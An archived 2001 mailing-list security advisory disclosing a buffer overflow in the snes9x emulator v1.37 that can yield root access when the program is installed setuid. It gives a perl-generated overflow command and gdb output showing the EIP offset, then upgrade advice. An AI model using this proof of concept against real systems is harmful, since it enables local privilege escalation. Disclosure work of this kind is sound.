Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Niels Heinen (zilli0ngmx.net)
Date: Tue Oct 16 2001 - 09:37:34 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    [ ** Snes9x buffer overflow vulnerability ** ]

    Affected version: v1.37 prior versions might also be affected.
    Tested platforms: FreeBSD, NetBSD, OpenBSD and Linux.

    A buffer overflow vulnerability exists in the snes9x emulator. The
    problem is that rom names given as an argument upon execution of
    the program are not processed correctly and can be used to trigger
    a buffer overflow.

    On many systems the snes9x has been installed setuid root (also
    recommended by the developers in the readme. This so it can access
    /dev/mem which is required to run the program in full screen mode.
    The setuid root bit gives the program the ability to perform actions
    with the privileges of root with other words: exploiting this issue
    can lead to root access.

    [ ** Exploit information ** ]

    Exploitation of this vulnerability is a bit tricky but defenitly
    You need a buffer of 4089 characters to own the EIP this buffer has
    to be contructed in a special way:

    bash-2.05$ ./snes9x `perl -e 'print "A" x 85;print "B" x 4004;'`
    Rate: 22050, Buffer size: 2048, 16-bit: yes, Stereo: yes, Encoded: no
    Segmentation fault (core dumped)
    bash-2.05$ gdb -core=snes9x.core
    GNU gdb 4.18
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i386-unknown-freebsd".
    Core was generated by `snes9x'.
    Program terminated with signal 11, Segmentation fault.
    #0 0x42424141 in ?? ()
    (gdb) info all
    eax 0x0 0
    ecx 0x282e3401 674116609
    edx 0x1 1
    ebx 0xbfbfab7c -1077957764
    esp 0xbfbfab4c 0xbfbfab4c
    ebp 0xbfbfab7a 0xbfbfab7a
    esi 0xbfbfcb7c -1077949572
    edi 0xbfbfbb7c -1077953668
    eip 0x42424141 0x42424141 ( == BBAA)
    eflags 0x10282 66178
    cs 0x1f 31
    ss 0x2f 47
    ds 0x2f 47
    es 0x2f 47
    fs 0x2f 47
    gs 0x2f 47

    As you can see the bytes 83 - 87 of our buffer overwrite the EIP. We (Hobbes
    and I) succesfully exploited this vulnerability on FreeBSD and Linux. Feel
    free to mail for more information!

    [ ** Fix information ** ]

    Upgrade your snes9x package to the latest version if you want to use
    it setuid root: http://www.snes9x.com



    Greets to Hobbes, all safemode.org and #hacker_help (!shit ;)

    Sent through GMX FreeMail - http://www.gmx.net